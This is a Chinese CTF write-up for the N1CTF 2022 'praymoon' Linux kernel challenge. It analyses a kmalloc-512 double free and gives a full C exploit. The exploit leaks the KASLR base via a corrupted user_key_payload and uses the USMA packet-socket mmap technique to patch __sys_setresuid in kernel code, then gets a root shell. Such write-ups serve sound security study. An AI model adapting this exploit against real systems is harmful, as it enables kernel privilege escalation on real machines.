N1CTF 2022 praymoon

漏洞分析

题目附件:praymoon.zip

系统版本:linux5.18.10,开启KASLR、SMEP、SMAP、KPTI防护措施。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ cat run.sh 
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-initrd ./rootfs.cpio \
-monitor /dev/null \
-append "root=/dev/ram console=ttyS0 oops=panic panic=1 quiet kaslr" \
-cpu kvm64,+smep,+smap\
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \
-no-reboot

/ $ uname -a
Linux (none) 5.18.10 #7 SMP PREEMPT_DYNAMIC Tue Nov 1 19:07:02 UTC 2022 x86_64 GNU/Linux
/ $ cat /sys/devices/system/cpu/vulnerabilities/*
Processor vulnerable
Mitigation: PTE Inversion
Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown
Mitigation: PTI
Not affected
Vulnerable
Mitigation: usercopy/swapgs barriers and __user pointer sanitization
Mitigation: Retpolines, STIBP: disabled, RSB filling
Not affected
Not affected

再看漏洞ko:只有一个ioctl接口,并且代码量不大。add_flag初始值是1,进0x5555分支可以有一次kmalloc的机会,申请的堆大小为0x200(512字节)。del_flag初始值是2,进0x6666分支可以有两次kfree的机会,所以这里是个double free的漏洞。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
__int64 __fastcall seven_ioctl(file *filp, unsigned int cmd, unsigned __int64 arg)
{
__int64 v4; // rdi

if ( cmd == 0x5555 )
{
if ( add_flag <= 0 )
return 0LL;
v4 = kmalloc_caches[9];
--add_flag;
moon = (char *)kmem_cache_alloc_trace(v4, 3520LL, 512LL);
printk(&unk_1F2, 3520LL);
return 0LL;
}
else if ( cmd == 0x6666 )
{
if ( moon )
{
if ( del_flag <= 0 )
return 0LL;
--del_flag;
kfree(moon, cmd, arg);
printk(&unk_202, cmd);
return 0LL;
}
// ...
}
// ...
}

因此,漏洞点非常明显,一个0x200(kmalloc-512)大小的double free,出题人并无意在此为难我们。题目给出如下编译选项:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_SHUFFLE_PAGE_ALLOCATOR=y

CONFIG_STATIC_USERMODEHELPER=y
CONFIG_STATIC_USERMODEHELPER_PATH=""

CONFIG_MEMCG=y
CONFIG_MEMCG_SWAP=y
CONFIG_MEMCG_KMEM=y

CONFIG_DEBUG_LIST=y

CONFIG_HARDENED_USERCOPY=y

漏洞利用 - USMA

常用的几个内核结构体大小都不是0x200,目前已知的非固定大小结构体有msg_msg和user_key_payload。

msg_msg的申请 带了GFP_KERNEL_ACCOUNT标志(会独立存在),而漏洞ko在申请内存时未使用该标志,因此它们的堆是隔离开的,无法构成利用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
// 为msg_msg和用户数据申请内存
__int64 __fastcall load_msg(__int64 a1, unsigned __int64 a2)
{
// ...
v5 = _kmalloc(v3 + 0x30, 0x400CC0LL);
// ...
}

// 漏洞ko的内存申请
__int64 __fastcall seven_ioctl(file *filp, unsigned int cmd, unsigned __int64 arg)
{
// ...
moon = (char *)kmem_cache_alloc_trace(v4, 0xDC0LL, 0x200LL);
// ...
}

// add_key
__int64 __fastcall _x64_sys_add_key(_QWORD *a1)
{
// ...
v14 = kvmalloc_node(v1, 0xCC0, -1);
// ...
}
// 为user_key_payload和用户数据申请内存
__int64 __fastcall user_preparse(_QWORD *a1)
{
// ...
v2 = _kmalloc(v1 + 0x18, 0xCC0LL);
// ...
}

user_key_payload中有datalen长度信息,利用double free(UAF)漏洞结合userfaultfd+setxattr可以改掉datalen,于是通过keyctl操作可以越界读取堆上的内容,泄露内核地址。

后续的提权使用USMA。

利用思路简化成下图步骤:

IMG_0415.png

  1. ko malloc
  2. ko free
  3. add_key malloc:user_key_payload占住堆块
  4. ko free
  5. setxattr malloc:改掉user_key_payload的datalen,结合userfaultfd,延迟释放
  6. keyctl read:越界读取堆上的内容,泄露内核基址
  7. keyctl revoke:释放user_key_payload占用的堆块
  8. packet socket:alloc_pg_vec()中kcalloc时占住堆块(USMA)
  9. setxattr free:延迟的释放
  10. setxattr malloc:第一次申请的不一定是目标堆块,因此结合userfaultfd多做几次申请(USMA)
  11. 通过mmap,改内核代码段逻辑,如_sys_setresuid,让普通用户可以通过setresuid(0, 0, 0);获得root权限。(USMA)

完整exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
// gcc usma-leak-exp.c -lpthread -static -o exp
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/xattr.h>
#include <sys/syscall.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <linux/keyctl.h>

int fd_seven;
char* addr;
char* aaa;
uint64_t kernel_base = 0;

uint64_t timer_expire_func = 0xffffffff81abd380;
uint64_t crypto_larval_destroy = 0xFFFFFFFF8143E280;

#define BZIMAGE_ADDR 0xFFFFFFFF81000000

#define COLOR_GREEN "\033[32m"
#define COLOR_RED "\033[31m"
#define COLOR_YELLOW "\033[33m"
#define COLOR_DEFAULT "\033[0m"

#define logd(fmt, ...) dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__)
#define logi(fmt, ...) dprintf(2, COLOR_GREEN "[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
#define logw(fmt, ...) dprintf(2, COLOR_YELLOW "[!] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
#define loge(fmt, ...) dprintf(2, COLOR_RED "[-] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
#define die(fmt, ...) \
do { \
loge(fmt, ##__VA_ARGS__); \
loge("Exit at line %d", __LINE__); \
exit(1); \
} while (0)


#ifndef PAGE_SIZE
#define PAGE_SIZE (0x1000)
#endif

#ifndef HEXDUMP_COLS
#define HEXDUMP_COLS 16
#endif

void hexdump(void *mem, unsigned int len) {
putchar('\n');
for(int i = 0; i < len + ((len % HEXDUMP_COLS) ? (HEXDUMP_COLS - len % HEXDUMP_COLS) : 0); i++) {
/* print offset */
if(i % HEXDUMP_COLS == 0) {
printf("0x%06x: ", i);
}

/* print hex data */
if(i < len) {
printf("%02x ", 0xFF & ((char*)mem)[i]);
}
/* end of block, just aligning for ASCII dump */
else {
printf(" ");
}

/* print ASCII dump */
if(i % HEXDUMP_COLS == (HEXDUMP_COLS - 1)) {
for(int j = i - (HEXDUMP_COLS - 1); j <= i; j++) {
/* end of block, not really printing */
if(j >= len) {
putchar(' ');
}
/* printable char */
else if(isprint(((char*)mem)[j])) {
putchar(0xFF & ((char*)mem)[j]);
}
/* other char */
else {
putchar('.');
}
}
putchar('\n');
}
}
putchar('\n');
}

void init_namespace(void) {
int fd;
char buff[0x100];

uid_t uid = getuid();
gid_t gid = getgid();

if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
die("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m");
}

if (unshare(CLONE_NEWNET)) {
die("unshare(CLONE_NEWNET): %m");
}

fd = open("/proc/self/setgroups", O_WRONLY);
snprintf(buff, sizeof(buff), "deny");
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", uid);
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", gid);
write(fd, buff, strlen(buff));
close(fd);
}


#ifndef ETH_P_ALL
#define ETH_P_ALL 0x0003
#endif

void packet_socket_rx_ring_init(int s, unsigned int block_size,
unsigned int frame_size, unsigned int block_nr,
unsigned int sizeof_priv, unsigned int timeout) {
int v = TPACKET_V3;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0) {
die("setsockopt(PACKET_VERSION): %m");
}

struct tpacket_req3 req;
memset(&req, 0, sizeof(req));
req.tp_block_size = block_size;
req.tp_frame_size = frame_size;
req.tp_block_nr = block_nr;
req.tp_frame_nr = (block_size * block_nr) / frame_size;
req.tp_retire_blk_tov = timeout;
req.tp_sizeof_priv = sizeof_priv;
req.tp_feature_req_word = 0;

rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (rv < 0) {
die("setsockopt(PACKET_RX_RING): %m");
}
}

int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) {
die("socket(AF_PACKET): %m");
}

packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
sizeof_priv, timeout);

struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;

int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0) {
die("bind(AF_PACKET): %m");
}

return s;
}

int pagealloc_pad(int count, int size) {
return packet_socket_setup(size, 2048, count, 0, 100);
}


void ErrExit(char* err_msg)
{
puts(err_msg);
exit(-1);
}

void RegisterUserfault(void *fault_page,void *handler)
{
pthread_t thr;
struct uffdio_api ua;
struct uffdio_register ur;
uint64_t uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
ua.api = UFFD_API;
ua.features = 0;
if (ioctl(uffd, UFFDIO_API, &ua) == -1)
ErrExit("[-] ioctl-UFFDIO_API");

ur.range.start = (unsigned long)fault_page;
ur.range.len = PAGE_SIZE;
ur.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1)
ErrExit("[-] ioctl-UFFDIO_REGISTER");
int s = pthread_create(&thr, NULL,handler, (void*)uffd);
if (s!=0)
ErrExit("[-] pthread_create");
}

void* userfaultfd_sleep20_handler(void* arg)
{
struct uffd_msg msg;
unsigned long uffd = (unsigned long) arg;
struct pollfd pollfd;
int nready;

pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
printf("[+] in usefaultfd handler, i will sleep 20s\n");
sleep(20);
printf("[+] sleep done\n");
if (nready != 1) ErrExit("[-] Wrong poll return val");

nready = read(uffd, &msg, sizeof(msg));
if (nready <= 0) ErrExit("[-] msg err");

char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED) ErrExit("[-] mmap err");
memset(page, 0, PAGE_SIZE);

struct uffdio_copy uc;
uc.src = (unsigned long) page;
uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
uc.len = PAGE_SIZE;
uc.mode = 0;
uc.copy = 0;
ioctl(uffd, UFFDIO_COPY, &uc);
// puts("[+] leak handler done");
return NULL;
}

void* userfaultfd_sleep3_handler(void* arg)
{
struct uffd_msg msg;
unsigned long uffd = (unsigned long) arg;
struct pollfd pollfd;
int nready;

pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
printf("[+] in usefaultfd handler, i will sleep 3s\n");
sleep(3);
printf("[+] sleep done\n");
if (nready != 1) ErrExit("[-] Wrong poll return val");

nready = read(uffd, &msg, sizeof(msg));
if (nready <= 0) ErrExit("[-] msg err");

char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED) ErrExit("[-] mmap err");
memset(page, 0, PAGE_SIZE);

struct uffdio_copy uc;
uc.src = (unsigned long) page;
uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
uc.len = PAGE_SIZE;
uc.mode = 0;
uc.copy = 0;
ioctl(uffd, UFFDIO_COPY, &uc);
// puts("[+] leak handler done");
return NULL;
}

void seven_kmalloc(){
ioctl(fd_seven,0x5555,0);
}

void seven_kfree(){
ioctl(fd_seven,0x6666,0);
}

void* setxattr_thread(void* addr_arg){
setxattr("/exp","bling",addr_arg,0x200,0);
// syscall(__NR_setxattr, "/exp", "bling", addr_arg, 0x200, 0);
return 0;
}


int key_alloc(char* description, char* payload, int payload_len)
{
return syscall(
__NR_add_key,
"user",
description,
payload,
payload_len,
KEY_SPEC_PROCESS_KEYRING
);
}

int key_read(int key_id, char *retbuf, int retbuf_len)
{
return syscall(
__NR_keyctl,
KEYCTL_READ,
key_id,
retbuf,
retbuf_len
);
}

int key_revoke(int key_id)
{
return syscall(
__NR_keyctl,
KEYCTL_REVOKE,
key_id,
0,
0,
0
);
}


int main(){
int packet_fds = 0;
int packet_fds1 = 0;
int i = 0;

pid_t pid = fork();
if(!pid){
init_namespace();
fd_seven = open("/dev/seven",2);

addr = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
RegisterUserfault(addr+0x1000, userfaultfd_sleep20_handler);

aaa = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
RegisterUserfault(aaa+0x1000, userfaultfd_sleep3_handler);
for(int k = 0x150; k > 0x0; k = k-0x8){
*(uint64_t*)(aaa+0x1000-k) = 'd';
}
*(uint64_t*)(aaa+0x1000-0x150) = 0x11111111;
*(uint64_t*)(aaa+0x1000-0x148) = 0x22222222;
*(uint64_t*)(aaa+0x1000-0x140) = 0x1000;

// malloc + free
seven_kmalloc();
seven_kfree();
// malloc: user_key_payload
char* in_buf = malloc(0x100);
memset(in_buf,'a',0x100);
int fd_key = key_alloc("description1",in_buf,0xF0);
// free
seven_kfree();
// malloc: setxattr
pthread_t thr1;
pthread_create(&thr1, NULL, setxattr_thread, aaa+0x1000-0x150); // kmalloc -> sleep(3) -> kfree
sleep(1);

// leak
char *retbuf1 = malloc(0x1000);
memset(retbuf1, 0, 0x1000);
int qqq = key_read(fd_key,retbuf1,0x1000);
printf("[+]qqq: %d\n",qqq);
// hexdump(retbuf1,0x1000);

for(i = 0;i < 0x200; i++){
uint64_t temp_value = *(uint64_t*)(retbuf1+i*8);
if(((temp_value>>32) == 0xffffffff) && ((temp_value & 0xfff) == 0x280)){
kernel_base = temp_value - (crypto_larval_destroy - BZIMAGE_ADDR);
printf("[+] kernel_base is: 0x%lx\n",kernel_base);
break;
}
}

if(i == 0x200){
printf("failed leak, reboot and try again!\n");
exit(0);
}

// free: user_key_payload
key_revoke(fd_key);
sleep(1);

// malloc: AF_PACKET
packet_fds = pagealloc_pad(33, 0x1000);
printf("page alloc done!\n");

// free, malloc, control
sleep(1); // waiting pthread's kfree
for(int j = 0x150; j > 0x0; j = j-0x8){
// *(uint64_t*)(addr+0x1000-j) = 0xFFFFFFFF81078000 - BZIMAGE_ADDR + kernel_base;
*(uint64_t*)(addr+0x1000-j) = 0xFFFFFFFF81086000 - BZIMAGE_ADDR + kernel_base;
}
// *(uint64_t*)(addr+0x1000-0x150) = 0xFFFFFFFF81078000 - BZIMAGE_ADDR + kernel_base;
*(uint64_t*)(addr+0x1000-0x150) = 0xFFFFFFFF81086000 - BZIMAGE_ADDR + kernel_base;

pthread_t thr_sleep,thr_sleep2;
pthread_create(&thr_sleep, NULL, setxattr_thread, addr+0x1000-0x150);
sleep(1);
pthread_create(&thr_sleep2, NULL, setxattr_thread, addr+0x1000-0x150);
sleep(1);

char *page = (char *)mmap(NULL, PAGE_SIZE * 33,
PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds, 0);
printf("mmap done\n");
// hexdump(page, 0x1000);

// page[0x997] = 0x7;
page[0xfd8] = 0xeb; // change if branch

pause();
}else{
sleep(8);
char buf[50]= {0};
printf("new\n");
setresuid(0, 0, 0);
printf("getuid: %d\n",getuid());
printf("geteuid: %d\n",geteuid());
int fd1 = open("/flag",0);
printf("fd:%d\n",fd1);
read(fd1,buf,0x20);
printf("flag:%s\n",buf);
system("/bin/sh");
// execl("/bin/sh", "sh", NULL);
}

pause();
return 0;
}

有几个需要注意的点:

  • 部分socket操作不允许普通用户执行,因此由子进程调用init_namspace()切换空间,然后执行利用逻辑。而父进程等待子进程操作完成后,提权获得root shell即可。
  • 由于利用过程中对目标0x200堆块有多次malloc和free操作,要保证0x200堆块链不被破坏,后续才能稳定get shell。

关于USMA

USMA用到了三个系统调用:

  • setsockopt
  • mmap
  • setresuid

前两个搭配可以更改内核任意代码段逻辑。

以setresuid为例,改掉__sys_setresuid()中if判断(或者改ns_capable_setid()的返回值,固定成1),使任意用户可以通过setresuid(0,0,0)将自己的uid改成0,即获得root权限。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
long __sys_setresuid(uid_t ruid, uid_t euid, uid_t suid)
{
// ...
if (!ns_capable_setid(old->user_ns, CAP_SETUID)) {
if (ruid != (uid_t) -1 && !uid_eq(kruid, old->uid) &&
!uid_eq(kruid, old->euid) && !uid_eq(kruid, old->suid))
goto error;
if (euid != (uid_t) -1 && !uid_eq(keuid, old->uid) &&
!uid_eq(keuid, old->euid) && !uid_eq(keuid, old->suid))
goto error;
if (suid != (uid_t) -1 && !uid_eq(ksuid, old->uid) &&
!uid_eq(ksuid, old->euid) && !uid_eq(ksuid, old->suid))
goto error;
}
// ...
}

调用梳理

packet_setsockopt:

entry_SYSCALL_64_after_hwframe() -> do_syscall_64() -> __x64_sys_setsockopt() -> __sys_setsockopt() -> packet_setsockopt() -> packet_set_ring() -> alloc_pg_vec() -> 申请n个struct pgv结构体

1
2
3
struct pgv {
char *buffer;
};

packet_mmap:

entry_SYSCALL_64_after_hwframe() -> do_syscall_64() -> _x64_sys_mmap() -> ksys_mmap_pgoff() -> vm_mmap_pgoff() -> do_mmap() -> mmap_region() -> call_mmap() -> sock_mmap() -> packet_mmap() -> vm_insert_page() -> validate_page_before_insert() -> 将pgv中虚拟地址对应的物理页映射到用户态

操作梳理

packet_setsockopt()最终调用alloc_pg_vec()申请一段内核堆空间,大小是用户态可控的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
// ...
// 根据用户态传入的block_nr,申请block_nr*8大小的内存
pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
// ...

for (i = 0; i < block_nr; i++) {
// 从buddy allocator申请block_nr个block_size(用户态指定)大小的块
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}
// ...
}

用户态mmap的时候,可以一次性将block_nr个block全部mmap到用户空间,如PAGE_SIZE * KMALLOC64_PAGE_CNT

1
2
char *page = (char *)mmap(NULL, PAGE_SIZE * KMALLOC64_PAGE_CNT,
PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds[i], 0);

用户态mmap在该环境下最终对应到内核packet_mmap()函数,将pg_vec中的虚拟地址全部重新映射给用户态。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
static int packet_mmap(struct file *file, struct socket *sock,
struct vm_area_struct *vma)
{
// ...
size = vma->vm_end - vma->vm_start;
if (size != expected_size)
goto out;

start = vma->vm_start;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec == NULL)
continue;

// rb->pg_vec_len是setsockopt()时传入的block_nr
for (i = 0; i < rb->pg_vec_len; i++) {
struct page *page;
// 从alloc_pg_vec()申请的堆中,取出各block的虚拟地址
void *kaddr = rb->pg_vec[i].buffer;
int pg_num;

// setsockopt()时传入的block_size/PAGE_SIZE,得到rb->pg_vec_pages
for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) {
// 将虚拟地址转换成物理页面page
page = pgv_to_page(kaddr);
// 建立物理内存与用户地址空间的映射关系
err = vm_insert_page(vma, start, page);
if (unlikely(err))
goto out;
start += PAGE_SIZE;
kaddr += PAGE_SIZE;
}
}
}
// ...
}

参考资料

USMA:用户态映射攻击

基于USMA的内核通用EXP编写思路在 CVE-2022-34918 上的实践

kernel-exploit-factory/CVE-2022-27666/exploit/

linux/unix下setuid/seteuid/setreuid/setresuid